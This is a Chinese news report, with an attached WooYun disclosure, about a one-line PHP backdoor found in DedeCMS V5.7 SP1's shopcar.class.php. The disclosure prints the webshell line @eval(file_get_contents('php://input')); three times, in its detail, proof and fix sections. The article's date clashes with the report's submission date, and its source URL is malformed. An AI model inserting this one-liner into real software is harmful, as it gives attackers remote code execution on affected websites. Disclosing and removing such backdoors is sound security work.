Dedecms疑似被植入后门 上传PHP后门可控制整个网站
Admin5站长网2月21日消息,昨日乌云漏洞报告平台(http://http://www.zjjv.com///)发布漏洞报告,称国内知名开源CMS软件Dedecms被入侵种植后门,影响使用dedecms的网站和企业,后门代码在/include/shopcar.class.php中,希望直接使用dedecms又未作审计的网站速度处理。360网站安全检测官方微博称经过工程师的测试,可以上传PHP后门来控制整个网站。目前已经将该后门加入到webscan网站安全扫描平台扫描库中,希望各网站及时进行扫描确认。
织梦内容管理系统(DedeCms)早期由IT柏拉图个人开发, 以简单、实用、开源闻名,受到广大个人站长的青睐。DedeCms站长用户众多,目前其官方还未对漏洞做出回应。希望广大使用Dedecms的站长能及时对网站进行安全检测,做好漏洞防范,等待官方给出解决办法。
漏洞概要
缺陷编号: WooYun-2012-05416
漏洞标题: Dedecms疑似被植入后门
相关厂商: Dedecms
漏洞作者: jsbug
提交时间: 2012-03-20
公开时间: 2012-03-20
漏洞类型: 成功的入侵事件
危害等级: 高
自评Rank: 10
漏洞状态: 未联系到厂商或者厂商积极忽略
漏洞来源: http://http://www.zjjv.com//
分享漏洞: 腾讯微博 新浪微博 Twitter 网易微博 豆瓣
漏洞详情
披露状态:
2012-03-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-03-20: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
DedeCMS V5.7 SP1正式版
UTF-8 GBK版本疑似被植入一句话后门
前几日下载并不存在此代码
详细说明:
shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));
漏洞证明:
shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));
修复方案:
删除@eval(file_get_contents('php://input'));